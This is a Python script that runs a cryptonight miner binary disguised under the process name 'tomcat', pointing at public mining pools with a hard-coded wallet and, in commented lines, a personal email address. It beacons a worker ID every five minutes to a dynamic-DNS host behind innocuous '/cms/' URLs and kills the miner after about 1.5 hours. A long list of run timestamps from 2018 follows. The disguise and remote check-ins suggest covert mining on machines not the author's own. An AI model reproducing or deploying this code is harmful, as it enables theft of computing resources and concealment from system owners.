import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:01.820360
#2018-02-17 16:35:08.019905
#2018-02-17 18:23:06.121217
#2018-02-17 20:11:03.717280
#2018-02-17 21:58:03.807523
#2018-02-17 23:43:05.975156
#2018-02-18 01:33:03.538054
#2018-02-18 03:19:05.721374
#2018-02-18 05:07:06.223646
#2018-02-18 06:58:06.048572
#2018-02-18 08:47:05.190147
#2018-02-18 10:34:06.104749
#2018-02-18 12:19:07.260965
#2018-02-18 14:06:01.931448
#2018-02-18 15:55:07.387477
#2018-02-18 17:44:07.282267
#2018-02-18 19:31:06.770044
#2018-02-18 21:16:03.630190
#2018-02-18 23:03:06.782923
#2018-02-19 00:50:07.279333
#2018-02-19 02:37:05.428313
#2018-02-19 04:23:02.113010
#2018-02-19 06:08:06.534906
#2018-02-19 07:57:03.723881
#2018-02-19 09:48:02.179567
#2018-02-19 11:38:06.993763
#2018-02-19 13:25:07.331847
#2018-02-19 15:12:05.437841
#2018-02-19 17:02:01.658744
#2018-02-19 18:48:09.672032
#2018-02-19 20:38:06.838465
#2018-02-19 22:24:01.394792
#2018-02-20 00:10:06.893420
#2018-02-20 01:56:05.236053
#2018-02-20 03:47:01.583818
#2018-02-20 05:33:05.848172
#2018-02-20 07:17:05.143103
#2018-02-20 09:04:01.374448
#2018-02-20 10:46:03.481401
#2018-02-20 12:32:08.101465
#2018-02-20 14:19:07.367189
#2018-02-20 16:02:08.030586
#2018-02-20 17:50:03.868605
#2018-02-20 19:41:08.036250
#2018-02-20 21:29:05.705513
#2018-02-20 23:12:04.874018
#2018-02-21 00:56:03.949748
#2018-02-21 02:42:03.602911
#2018-02-21 04:29:06.521664
#2018-02-21 06:17:02.194141
#2018-02-21 08:03:01.697656
#2018-02-21 09:48:07.717073
#2018-02-21 11:37:07.960436
#2018-02-21 13:26:01.730954
#2018-02-21 15:11:01.652777
#2018-02-21 17:01:13.238191
#2018-02-21 18:49:04.150890
#2018-02-21 20:38:06.064493
#2018-02-21 22:23:07.832040
#2018-02-22 00:13:06.239371
#2018-02-22 01:59:03.968506
#2018-02-22 03:46:02.142278
#2018-02-22 05:32:06.237694
#2018-02-22 07:17:07.893963
#2018-02-22 09:05:03.985524
#2018-02-22 10:52:06.184093
#2018-02-22 12:38:09.278816
#2018-02-22 14:24:07.879205
#2018-02-22 16:10:11.070295
#2018-02-22 17:57:04.841069
#2018-02-22 19:44:08.844607
#2018-02-22 21:34:08.050157
#2018-02-22 23:20:09.521772
#2018-02-23 01:07:06.583100
#2018-02-23 02:54:05.311634
#2018-02-23 04:34:07.279250
#2018-02-23 06:20:04.180906
#2018-02-23 08:06:07.550309
#2018-02-23 10:19:07.718033
#2018-02-23 12:11:04.023093
#2018-02-23 13:57:07.685708
#2018-02-23 15:51:02.140725
#2018-02-23 17:35:07.233035
#2018-02-23 19:23:03.642978
#2018-02-23 21:07:04.807060
#2018-02-23 22:53:06.118626
#2018-02-24 01:13:03.813504
#2018-02-24 03:03:05.187055
#2018-02-24 04:49:05.754102
#2018-02-24 06:33:04.083728
#2018-02-24 08:21:06.450260
#2018-02-24 10:04:08.076442
#2018-02-24 12:03:01.628145
#2018-02-24 13:50:06.521344
#2018-02-24 15:31:07.656016
#2018-02-24 17:27:01.654027
#2018-02-24 19:14:04.695597
#2018-02-24 21:03:05.139939
#2018-02-24 23:36:05.429529
#2018-02-25 02:57:01.477068
#2018-02-25 06:49:05.298323